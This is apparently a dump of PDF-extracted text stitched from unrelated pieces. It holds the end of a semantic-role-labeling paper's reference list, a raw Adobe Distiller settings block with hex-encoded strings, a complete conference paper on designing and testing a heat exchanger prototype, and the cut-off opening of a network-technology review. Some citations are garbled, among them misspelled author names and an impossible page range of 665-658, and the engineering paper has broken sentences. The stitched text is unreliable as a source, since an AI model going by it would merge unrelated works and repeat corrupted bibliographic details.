Berndl, Vijay Pande, and Patrick Riley. 2016. Mo- lecular graph convolutions: Moving beyond fingerprints. Journal of Computer-Aided Mo- lecular design, 30(8):595–608. Atif Khan, Naomie Salim, and Yogan Jaya Kumar. 2015. A framework for multi-document ab- stractive summarization based on semantic role labelling. Applied Soft Computing, 30:737–747. Diederik P. Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. arXiv preprint, arXiv:1412.6980. Eliyahu Kiperwasser and Yoav Goldberg. 2016. Simple and accurate dependency parsing using bidirectional LSTM feature representations. Transactions of the Association for Compu- tational Linguistics, 4:313–327. Thomas N. Kipf and Max Welling. 2017. Semi- supervised classification with graph convolu- tional networks. In Proceedings of the 5th International Conference on Learning Repre- sentations. Toulon. Joel Lang and Mirella Lapata. 2010. Unsupervised induction of semantic roles. In Human Lan- guage Technologies: The 2010 Annual Con- ference of the North American Chapter of the Association for Computational Linguistics, pages 939–947. Tao Lei, Yuan Zhang, Lluı́s Màrquez, Alessandro Moschitti, and Regina Barzilay. 2015. High-order low-rank tensors for se- mantic role labeling. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 1150–1160. Denver, CO. Wang Ling, Chris Dyer, Alan W Black, and Isabel Trancoso. 2015. Two/too simple adaptations of word2vec for syntax problems. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 1299–1304, Denver, CO. Minh-Thang Luong, Quoc V. Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2016. Multi-task sequence to sequence learning. In Proceedings of the International Conference on Learning Representations. San Juan, PR. Diego Marcheggiani, Joost Bastings, and Ivan Titov. 2018. Exploiting semantics in neural machine translation with graph convolutional networks. In Proceedings of the the 16th Annual Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT 2018). New Orleans, LA. Diego Marcheggiani, Anton Frolov, and Ivan Titov. 2017. A simple and accurate syntax- agnostic neural model for dependency-based semantic role labeling. In Proceedings of the 21st Conference on Computational Natural Lan- guage Learning (CoNLL 2017), pages 411–420. Vancouver. Diego Marcheggiani and Ivan Titov. 2017. Encoding sentences with graph convolutional networks for semantic role labeling. In Proceed- ings of the 2017 Conference on Empirical Methods in Natural Language Processing, pages 1506–1515. Copenhagen. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Corrado, and Jeff Dean. 2013, Distributed representations of words and phrases and their compositionality. In Advances in Neural Information Processing Systems 26, pages 3111–3119. 355 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Marth Palmer, Daniel Gildea, and Paul Kingsbury. 2005. The proposition bank: An annotated corpus of semantic roles. Computational Linguistics, 31(1):71–106. Mitchell P. Parcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated corpus of English: The Penn treebank. Computational Linguistics, 19(2):313–330. Hao Peng, Sam Thomson, and Noah A. Smith. 2017. Deep multitask learning for semantic dependency parsing. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 2037–2048. Matthew Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, and Luke Zettlemoyer. 2018. Deep con- textualized word representations. In Pro- ceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Lan- guage Technologies, Volume 1 (Long Papers), pages 2227–2237. Barbara Plank. 2016. Keystroke dynamics as signal for shallow syntactic parsing. In Proceedings of the 26th International Conference on Computational Linguistics: Technical Papers, pages 609–619. Osaka. Sameer Pradhan, Alessandro Moschitti, Nianwen Xue, Hwee Tou Ng, Anders Björkelund, Olga Uryupina, Yuchen Zhang, and Zhi Zhong. 2013. Towards robust linguistic anal- ysis using Ontonotes. In Proceedings of the Seventeenth Conference on Computational Natural Language Learning, pages 143–152. Sofia. Michael Roth and Mirella Lapata. 2016. Neural semantic role labeling with dependency path embeddings. In Proceedings of the 54th Annual Meeting of the Association for Com- putational Linguistics (Volume 1: Long Papers), pages 1192–1202. Berlin. Anders Søgaard and Yoav Goldberg. 2016. Deep multi-task learning with low level tasks supervised at lower layers. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 231–235. Berlin. Emma Strubell, Patrick Verga, Daniel Andor, David Weiss, and Andrew McCallum. 2018. Linguistically-informed self-attention for se- mantic role labeling. In Proceedings of the 2018 Conference on Empirical Methods in Nat- ural Language Processing, pages 5027–5038. Mihai Surdeanu, Richard Johansson, Adam Meyers, Lluı́s Màrquez, and Joakim Nivre. 2008. The CONLL 2008 Shared Task on joint parsing of syntactic and semantic dependencies. In CoNLL 2008: Proceedings of the 12th Con- ference on Computational Natural Language Learning, pages 159–177. Swabha Swayamdipta, Sam Thomson, Chris Dyer, and Noah A Smith. 2017. Frame-semantic par- sing with softmax-margin segmental RNNS and a syntactic scaffold. arXiv preprint, arXiv:1706.09528. Oriol Vinyals, Lukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey Hinton. 2015. Grammar as a foreign language. In Proceedings of the 28th International Con- ference on Neural Information Processing Systems, pages 2773–2781. Montreal. Nanwen Xue, Fei Xia, Fu Dong Chiou, and Martha Palmer. 2005. The Penn Chinese treebank: Phrase structure annotation of a large corpus. Natural Language Engineering, 11(2):207–238. Nianwen Xue and Martha Palmer. 2009. Adding semantic roles to the Chinese treebank. Natural Language Engineering, 15(1):143–172. Yuan Zhang and David Weiss. 2016. Stack- propagation: Improved representation learning for syntax. In Proceedings of the 54th An- nual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1557–1566. Jie Zhou and Wei Xu. 2015. End-to-end learning of semantic role labeling using recurrent neural networks. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 1127–1137. Beijing. 356 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Introduction Model Description Dependency Information Extractor Syntax-aware Semantic Role Labeler Experiments Results Ablation Studies and Analysis Dependency Annotations Related Work Conclusions << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /All /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Tags /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile () /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages true /ColorImageDownsampleType /Bicubic /ColorImageResolution 300 /ColorImageDepth -1 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /DCTEncode /AutoFilterColorImages true /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages true /GrayImageDownsampleType /Bicubic /GrayImageResolution 300 /GrayImageDepth -1 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /DCTEncode /AutoFilterGrayImages true /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages true /MonoImageDownsampleType /Bicubic /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile () /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_qldkrejomzbxjk65tmsufi3pum ---- Conference Full Paper template International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-025 30 Design Heat Exchanger: Optimization and Efficiency Haifa El-Sadi*, Joe Aitken, Jason Ganley, David Ruyffelaert, Cam Sweeney Wentworth Institute of Technology 550 Huntington, Boston, MA, USA 02115 *Corresponding author: elsadih@wit.edu Abstract—Modern commercial and residential buildings procure HVAC systems, to provide heating and cooling for designed open and enclosed spaces to dissipate throughout the accustomed zones. HVAC (heating, ventilating, and air conditioning) systems have become a required industry standard for the construction of new buildings. The objective is the optimization of a heat exchanger model by resolving common system concerns; efficiency, fouling, leakage, dead zones, and vibration. These issues are prevalent in the HVAC industry, which are critical to the under-performing heat exchangers. The heat exchanger was tested at only three different wind speeds (20, 40%, 60%) to take the temperature readings every 5 minutes to allow for maximal heat transfer. The efficiency of heat exchanger at the specified speeds was determined to be .7413 at 20%, .6463 at 40% and .6351 at 60%. Keywords-Heat Exchanger; Efficiency; Buildings; Design I. INTRODUCTION Mankind is about to install their 700 millionth air conditioner. This baffling number creates great opportunity for engineers because behind each air conditioner there is a heat exchanger doing the heavy lifting to bring comfort to billions of people. Heat exchangers have sought be an engineering challenge and still after 700 million there are still problems that can be resolved. Common problems that heat exchangers endure are fouling, dead zones, and leakage and tube vibrations. Fouling is the reduction of performance due to the build of undesired material. This can be the result of corrosion within the heat exchanger and the lack of filtration prior to fluid entering the heat exchanger. Dead zones can lead to significant fouling and are sections of the heat exchanger that the flow is notably less compared to the rest of the heat exchanger. In most cases dead zones are the result of baffles that most heat exchangers use. But in most cases the baffles are essential for the heat transfer so eliminating them cannot be discussed. Leakage occurs when there is a loss of fluid from the heat exchanger, this results in reduced efficiency. Typically, leakage is the result of faulty connections from poor welding or stressed joints. Tube vibrations can cause the most significant damage to heat exchanger. This can be the result of very high velocity axial and perpendicular flow applications. In addition to resolving common heat exchanger problems the end goal is to improve the efficiency of the heat exchanger. R.L Webb et al. focused on [1] four design cases: (1) reduced heat exchanger material; (2) increased heat duty; (3) reduced log-mean temperature difference; and (4) reduced pumping power. The novel method was presented by B. Linnhoff et al. [2], the method is the first to combine sufficient simplicity to be used by hand with near certainty to identify “best” designs, even for large problems. “Best” designs feature the highest degree of energy recovery possible with a given number of capital items. Previous work [3] showed that three rough tube applications are presented: 1. to obtain increased heat exchange capacity; 2. to reduce the friction power; and 3. to permit a reduction of heat-transfer surface area. Adrian [4] examined the coupling between losses due to heat transfer across the stream-to stream ΔT and losses caused by fluid friction using the concept of heat-exchanger irreversibility. II. DESIGN AND ANALYSIS Solid works was used to design different models of heat exchanger, Equation Engineering solver (EES) was used for calculations and analysis, the efficient prototype heat exchanger is shown in Figure 1. Table 1 shows the dimensions of the inner tube and the properties of the fluid (water). International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 31 Figure 1. Sectioned SolidWorks model of shell and tube heat exchanger with copper coil and finned inner wall. TABLE I. INTERNAL FLOW CALCULATIONS Properties of Water: Properties were found at the average temperature between the surface of the pipe and liquid and a pressure of 101.3 N/m 2 , using Equation Engineering solver (EES) to write the code and solve for the amount of heat transfer. TABLE II. EXTERNAL FLOW CALCULATIONS Initially the shell of the heat exchanger was going to be formed using sheet metal. With concerns of burn-through while welding the shell together it was determined that buying HVAC duct would reduce manufacturing time and eliminate concerns of sealing the shell together. The second difference between the prototype and the model is the use of fans to send air through the shell. Initially the plan was to incorporate fans within the shell that would send air through and out the other side. The main concern with this idea was if we were going to be able to vary the fan speed for calculation purposes. It was determined that a 4" flexible duct was attached from the heat exchanger to the wind turbine in Wentworth's Fluid Dynamics Lab where we would be able to vary wind speed during testing. Not only did this decision save money it also eliminated doubt from our calculations. The third difference is the overall length of the prototype. This work initially planned to make the shell 18" long with 6" diameter. While we kept the diameter the same, the heat exchanger is now 24" long due to the need for an additional connection piece for the HVAC duct that International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 32 was not initially incorporated into the SolidWorks model. III. MANUFACTURING PROTOTYPE PARTS The prototype consists of ten major part that will be assembled into a heat exchanger. The parts consist of the controller, pump, piping, valves, stand, reservoir, coil, slides, shell and caps. Out of these nine parts, the stand, reservoir and slides needed to be manufactured in the projects lab. This work manufactured all these parts on the Wentworth Campus in the Manufacturing Lab and Projects Lab. The stand was manufactured in three major steps. First, we bout ¼ inch plywood and drew the dimensions that would sufficiently hold the tube and reservoir tank. The two vertical pieces were measure to the dimensions of 1' wide and 1.5' tall with a 6" diameter half circle cut at the top to hold the tube in place. The base piece was also dimensioned to be 1' wide and 2' long to hold the tube at the two ends. A small shelf to hold the pump and valves was dimensions to be 1' wide and 6" long. The second steps consisted of cutting all the pieces. This work used two tools to accurately cut the plywood, a circular and jig saw. The circular saw was used to cut the straight angles while the jig saw was used to cut the 6" diameter half circles. After the pieces were cut the stand could be assembled. The third step consisted of using 15 angle brackets, 60 screws and the three- stand pieces to assemble the stand. Three angle brackets were screwed into each inside portion of the base and vertical pieces with two angle brackets on the outside to ensure stability. The shelf was fastened in a similar manner to the outside of the vertical piece. A. Reservoir This work manufactured the reservoir using copper plates, angle brackets, screws, JB weld, and flex seal. First, it the precut copper plates and angled them against each other at 90 degrees to construct an open box, and screed the brackets in place at 3 points per corner. Next, with duct taped the outside of the box to ensure a tight seal between the two pieces and applied the JB weld to all the seams. After an hour of curing we applied flex seal to the entire surface of the inside. This sealed between the screws ensuing a waterproof reservoir. B. Slides The slides were manufactured using a Solidworks model, which was then converted over to a CAM file. The milling machines would have taken about 3 hours per slide, so we opted to use the LPM. The process with 26 minutes per part, which was a noticeable efficiency difference. The center hole was a quarter of an inch and was pressed out. The plate was then clamped down into the LPM and the larger holes began to mill. Then the circles were cut out from the existing material, with a helix pattern. A hole was drilled at both ends of the shell to allow the ends of the coil to protrude out so that we could connect the fluidics tubing. Once that was all done the end caps were placed on the ends of the shell which shrank the shell diameter from 6” to 4". Figure 2. The heat exchanger prototype International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 33 After that insulation was put on the whole shell assembly to prevent any possible heat from escaping. With the whole shell finished it was time to put the rest of the manufactured parts together. The shell assembly was placed into the 6" diameter half circles in the wooden stand so that it could be supported horizontally. The copper reservoir was then placed underneath the shell assembly. Fluidics tubing was then connected from one of the ends of the copper coil from the shell to one side of the reservoir tank. This where the water will go after going through the heat exchanger. An overflow hole and tube were made in the reservoir to be directed back towards the sink. Electronic valve A was used to pull water from the hot sink water that was stored in a trash car and heated by a Bunsen burner. Piping from the trash can to Electronic Valve A, then the valve to the pump was made. Electronic Valve B was used to pull water from the reservoir tank. Piping from the reservoir tank to Electronic Valve B, then the valve to the pump was made. The final piping from the pump to the inlet part of the coil completed the piping system. Figure 2 shows the heat exchanger prototype. Figure 3. The electronic part of the heat exchanger Two temperature controllers as shown in figure 3 were used to regulate the opening and closing of the valves. The wires from Electronic Valve A are connected to Controller A. The wires from Electronic Valve B are connected to Controller B. The source connection for the two controllers are to be wired together and connected to a DC source controller supplied by the Electrical Lab. Figure 4 shows testing the heat exchanger. Figures 5, 6 and 7 show the effect of time on the air outlet temperature. Figure 4. Testing the heat exchanger Figure 5. Time vs. outlet air temperature at 20% wind speed International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 34 Figure 6. Time vs. outlet air temperature at 40% wind speed Figure 7. Time vs. outlet air temperature at 60% wind speed Figure 8. Effectiveness vs wind speed Initially the heat exchanger was tested with fan speeds starting at 20% increasing up to 100% in increments of 10. However, it was determined that by increasing the fan speed percentage so rapidly there would not be enough time for maximal heat transfer. Knowing this, it was determined that the heat International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 35 exchanger would be best to test at only three different wind speeds (20, 40%, 60%) and to take the temperature readings every 5 minutes to allow for maximal heat transfer. Before testing the heat exchanger for the second trial it was hypothesized that since slower fan speeds would allow the air to stay in contact with the inside of the heat exchanger longer the efficiency would be higher. Looking at the graphs above this hypothesis was proven to be correct. Every 5 minutes the inlet and outlet temperatures of both the air and the water were recorded based on the readings given from the thermocouples. While running the heat exchanger the pump sent the water through the copper coils at a constant velocity of .0667 m/s. For the three different fan speed percentages of 20, 40, and 60, the air velocities were measured at 2.2 m/s, 3.87 m/s, and 6.5 m/s. At each fan speed 5 temperature readings were taken, the temperature change between the 1st and 5th reading was then used to determine the efficiency of the heat exchanger at the specified air and water velocities with respect to the initial temperatures of both the water and air. By using the same equations that were used to analyse the initial four designs the effectiveness of the heat exchanger at the specified speeds was determined to be .7413 at 20%, .6463 at 40% and .6351 at 60% as shown in figure 8. IV. CONCLUSION After months of research, designing, building and testing we concluded that the heat exchanger provides an effectiveness that is below average compared to common industrial designs. Some variables that may have affected our results are the following; since it is the middle of the summer the outside temperature is quite high making it difficult to determine the true change in temperature since the inlet and outlet temperatures are quite close to one another. If this test was done in the winter are values could potentially be much better. Also, the reservoir tank had a hard time maintaining a warm enough temperature so that could start using the water from it rather than main water source. This may be due to the fact that we used Flex Seal to make sure the tank was water tight. The thermal conductivity of Flex Seal is much lower than copper which is what the tank is made out of. By spraying it everywhere the thermal conductivity of the tank as a whole might not be as high as thought. Overall heat exchanger did what wanted it to and by making these and other modifications the work believe can perform better. ACKNOWLEDGEMENTS This project very much to thank Wentworth Project lab and Professor Jackson for Their Support. REFERENCES [1] R.L Webb, “Performance evaluation criteria for use of enhanced heat transfer surfaces in heat exchanger design”, international journal of heat and mass transfer, volume 24, pages 715-726. [2] B. Linnhoff and E. Hindmarsh, “The pinch design method for heat exchanger networks”, chemical engineering science, volume 38, pages 745-763. [3] R.L Webb and E.R.G Eckert, “Application of rough surfaces to heat exchanger design”, international journal of heat and mass transfer Volume 15, pages 1647-1658. [4] Adrian Bejan, “General criterion for rating heat exchanger performance”, international journal heat and mass transfer, volume 21, pages 665-658. work_qn7irvgulrbyhoipdvk52f7jem ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-009 61 Review of Network Technology System from the Past, Present to the Future Mou Chengjin China International Strategic Research Center of Mobile Communications Joint Association Beijing, 100029, China, 